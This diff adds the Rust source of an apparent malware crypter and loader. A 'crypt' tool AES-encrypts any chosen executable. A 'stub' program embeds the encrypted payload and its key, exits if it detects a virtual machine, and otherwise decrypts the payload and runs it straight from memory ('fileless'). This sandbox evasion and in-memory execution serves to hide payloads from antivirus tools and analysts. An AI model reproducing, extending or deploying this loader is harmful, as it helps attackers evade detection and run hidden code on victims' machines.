diff --git a/crypt/Cargo.lock b/crypt/Cargo.lock new file mode 100644 index 0000000..0be2db5 --- /dev/null +++ b/crypt/Cargo.lock @@ -0,0 +1,183 @@ +# This file is automatically @generated by Cargo. +# It is not intended for manual editing. +version = 3 + +[[package]] +name = "aes" +version = "0.8.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "433cfd6710c9986c576a25ca913c39d66a6474107b406f34f91d4a8923395241" +dependencies = [ + "cfg-if", + "cipher 0.4.4", + "cpufeatures", +] + +[[package]] +name = "block-modes" +version = "0.7.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "57a0e8073e8baa88212fb5823574c02ebccb395136ba9a164ab89379ec6072f0" +dependencies = [ + "block-padding", + "cipher 0.2.5", +] + +[[package]] +name = "block-padding" +version = "0.2.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8d696c370c750c948ada61c69a0ee2cbbb9c50b1019ddb86d9317157a99c2cae" + +[[package]] +name = "cfg-if" +version = "1.0.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" + +[[package]] +name = "cipher" +version = "0.2.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "12f8e7987cbd042a63249497f41aed09f8e65add917ea6566effbc56578d6801" +dependencies = [ + "generic-array", +] + +[[package]] +name = "cipher" +version = "0.4.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "773f3b9af64447d2ce9850330c473515014aa235e6a783b02db81ff39e4a3dad" +dependencies = [ + "crypto-common", + "inout", +] + +[[package]] +name = "cpufeatures" +version = "0.2.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3e4c1eaa2012c47becbbad2ab175484c2a84d1185b566fb2cc5b8707343dfe58" +dependencies = [ + "libc", +] + +[[package]] +name = "crypt" +version = "0.1.0" +dependencies = [ + "aes", + "block-modes", + "crypto", + "rand", +] + +[[package]] +name = "crypto" +version = "0.4.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "17d88231face754cdb045c1b65912a0f4ff78ca24bf371e30a4a8cfa993b3897" +dependencies = [ + "crypto-common", +] + +[[package]] +name = "crypto-common" +version = "0.1.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1bfb12502f3fc46cca1bb51ac28df9d618d813cdc3d2f25b9fe775a34af26bb3" +dependencies = [ + "generic-array", + "typenum", +] + +[[package]] +name = "generic-array" +version = "0.14.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "85649ca51fd72272d7821adaf274ad91c288277713d9c18820d8499a7ff69e9a" +dependencies = [ + "typenum", + "version_check", +] + +[[package]] +name = "getrandom" +version = "0.2.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c85e1d9ab2eadba7e5040d4e09cbd6d072b76a557ad64e797c2cb9d4da21d7e4" +dependencies = [ + "cfg-if", + "libc", + "wasi", +] + +[[package]] +name = "inout" +version = "0.1.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a0c10553d664a4d0bcff9f4215d0aac67a639cc68ef660840afe309b807bc9f5" +dependencies = [ + "generic-array", +] + +[[package]] +name = "libc" +version = "0.2.144" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2b00cc1c228a6782d0f076e7b232802e0c5689d41bb5df366f2a6b6621cfdfe1" + +[[package]] +name = "ppv-lite86" +version = "0.2.17" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5b40af805b3121feab8a3c29f04d8ad262fa8e0561883e7653e024ae4479e6de" + +[[package]] +name = "rand" +version = "0.8.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404" +dependencies = [ + "libc", + "rand_chacha", + "rand_core", +] + +[[package]] +name = "rand_chacha" +version = "0.3.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88" +dependencies = [ + "ppv-lite86", + "rand_core", +] + +[[package]] +name = "rand_core" +version = "0.6.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ec0be4795e2f6a28069bec0b5ff3e2ac9bafc99e6a9a7dc3547996c5c816922c" +dependencies = [ + "getrandom", +] + +[[package]] +name = "typenum" +version = "1.16.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "497961ef93d974e23eb6f433eb5fe1b7930b659f06d12dec6fc44a8f554c0bba" + +[[package]] +name = "version_check" +version = "0.9.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "49874b5167b65d7193b8aba1567f5c7d93d001cafc34600cee003eda787e483f" + +[[package]] +name = "wasi" +version = "0.11.0+wasi-snapshot-preview1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9c8d87e72b64a3b4db28d11ce29237c246188f4f51057d65a7eab63b7987e423" diff --git a/crypt/Cargo.toml b/crypt/Cargo.toml new file mode 100644 index 0000000..c9df01d --- /dev/null +++ b/crypt/Cargo.toml @@ -0,0 +1,12 @@ +[package] +name = "crypt" +version = "0.1.0" +edition = "2021" + +# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html + +[dependencies] +block-modes = "0.7.0" +rand = "0.8.4" +aes = "0.8.2" +crypto = "0.4.0" diff --git a/crypt/src/main.rs b/crypt/src/main.rs new file mode 100644 index 0000000..74db37d --- /dev/null +++ b/crypt/src/main.rs @@ -0,0 +1,46 @@ +use aes::Aes128; +use aes::cipher::{ + BlockEncrypt, KeyInit, + generic_array::GenericArray, +}; +use std::fs::read; +use std::fs::File; +use std::io::prelude::*; +use rand::rngs::StdRng; +use rand::{RngCore, SeedableRng}; + +fn main() -> std::io::Result<()> { + // Read input file into a vector RENAME example.exe to what you want and put it in this "crypt" folder + let plaintext_bytes = read("example.exe").expect("Failed to read file"); + + let mut encrypted_file = File::create("encrypted_Input.bin")?; + let mut key_file = File::create("key.txt")?; + + // Define block size, in this case AES-128 + let block_size = 16; + + // Pad the bytes + let padding_size = block_size - (plaintext_bytes.len() % block_size); + let mut padded_plaintext_bytes = plaintext_bytes.clone(); + padded_plaintext_bytes.extend(vec![padding_size as u8; padding_size]); + + // Gen cipher with a key using nonce token + let mut nonce = [0u8; 16]; + let mut rng = StdRng::from_entropy(); + rng.fill_bytes(&mut nonce); + let key = GenericArray::from_slice(&nonce); + + let cipher = Aes128::new(&key); + + // Encrypt the bytes in blocks + let mut enc_bytes = Vec::new(); + for block in padded_plaintext_bytes.chunks(block_size) { + let mut block_array = GenericArray::clone_from_slice(block); + cipher.encrypt_block(&mut block_array); + enc_bytes.extend_from_slice(&block_array); + } + + encrypted_file.write_all(&enc_bytes)?; + key_file.write_all(&key)?; + Ok(()) +} \ No newline at end of file diff --git a/stub/Cargo.lock b/stub/Cargo.lock new file mode 100644 index 0000000..ceaeab3 --- /dev/null +++ b/stub/Cargo.lock @@ -0,0 +1,107 @@ +# This file is automatically @generated by Cargo. +# It is not intended for manual editing. +version = 3 + +[[package]] +name = "aes" +version = "0.8.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "433cfd6710c9986c576a25ca913c39d66a6474107b406f34f91d4a8923395241" +dependencies = [ + "cfg-if", + "cipher", + "cpufeatures", +] + +[[package]] +name = "cfg-if" +version = "1.0.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" + +[[package]] +name = "cipher" +version = "0.4.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "773f3b9af64447d2ce9850330c473515014aa235e6a783b02db81ff39e4a3dad" +dependencies = [ + "crypto-common", + "inout", +] + +[[package]] +name = "cpufeatures" +version = "0.2.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3e4c1eaa2012c47becbbad2ab175484c2a84d1185b566fb2cc5b8707343dfe58" +dependencies = [ + "libc", +] + +[[package]] +name = "crypto-common" +version = "0.1.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1bfb12502f3fc46cca1bb51ac28df9d618d813cdc3d2f25b9fe775a34af26bb3" +dependencies = [ + "generic-array", + "typenum", +] + +[[package]] +name = "generic-array" +version = "0.14.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "85649ca51fd72272d7821adaf274ad91c288277713d9c18820d8499a7ff69e9a" +dependencies = [ + "typenum", + "version_check", +] + +[[package]] +name = "inout" +version = "0.1.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a0c10553d664a4d0bcff9f4215d0aac67a639cc68ef660840afe309b807bc9f5" +dependencies = [ + "generic-array", +] + +[[package]] +name = "inside-vm" +version = "0.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3518e289386082220db48c380f414722e25263af4160f8577c247dae0c6f3829" + +[[package]] +name = "libc" +version = "0.2.144" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2b00cc1c228a6782d0f076e7b232802e0c5689d41bb5df366f2a6b6621cfdfe1" + +[[package]] +name = "memexec" +version = "0.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bc62ccb14881da5d1862cda3a9648fb4a4897b2aff0b2557b89da44a5e550b7c" + +[[package]] +name = "stub" +version = "0.1.0" +dependencies = [ + "aes", + "inside-vm", + "memexec", +] + +[[package]] +name = "typenum" +version = "1.16.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "497961ef93d974e23eb6f433eb5fe1b7930b659f06d12dec6fc44a8f554c0bba" + +[[package]] +name = "version_check" +version = "0.9.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "49874b5167b65d7193b8aba1567f5c7d93d001cafc34600cee003eda787e483f" diff --git a/stub/Cargo.toml b/stub/Cargo.toml new file mode 100644 index 0000000..0800fd5 --- /dev/null +++ b/stub/Cargo.toml @@ -0,0 +1,11 @@ +[package] +name = "stub" +version = "0.1.0" +edition = "2021" + +# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html + +[dependencies] +inside-vm = "0.2.0" +aes = "0.8.2" +memexec = "0.2" \ No newline at end of file diff --git a/stub/src/main.rs b/stub/src/main.rs new file mode 100644 index 0000000..6ae5b90 --- /dev/null +++ b/stub/src/main.rs @@ -0,0 +1,52 @@ +use aes::Aes128; +use aes::cipher::{BlockDecrypt, KeyInit, + generic_array::GenericArray, +}; +use inside_vm::inside_vm; +use std::io::{Read, Cursor}; +use std::io::Result; + + +fn main(){ + if inside_vm(){ + println!("This is in a vm"); + std::process::exit(0); + } else { + println!("NO VM"); + let pe_bytes = decrypt_file().unwrap(); + fileless(pe_bytes); + } +} + +fn decrypt_file() -> Result> { + // Read encrypted bytes and store bytes of key :3 + let encrypted_bytes = include_bytes!("encrypted_Input.bin"); + let mut key_bytes: [u8; 16] = [0; 16]; + let mut key_file = Cursor::new(include_bytes!("key.txt")); + key_file.read_exact(&mut key_bytes)?; + + // Gen cipher with the key B-) + let key = GenericArray::from(key_bytes); + let cipher = Aes128::new(&key); + + // Decrypt the encrypted bytes in blocks + let mut decrypted_bytes = Vec::new(); + for block in encrypted_bytes.chunks(16) { + let mut block_array = GenericArray::clone_from_slice(block); + cipher.decrypt_block(&mut block_array); + decrypted_bytes.extend_from_slice(&block_array); + } + + // Unpad the decrypted bytes + let padding_size = decrypted_bytes.last().unwrap().clone() as usize; + let decrypted_bytes = (&decrypted_bytes[..decrypted_bytes.len() - padding_size]).to_vec(); + + // return decrypted bytes + Ok(decrypted_bytes, ) +} + +fn fileless(bytes: Vec){ + unsafe { + memexec::memexec_exe(&bytes).unwrap(); + } +}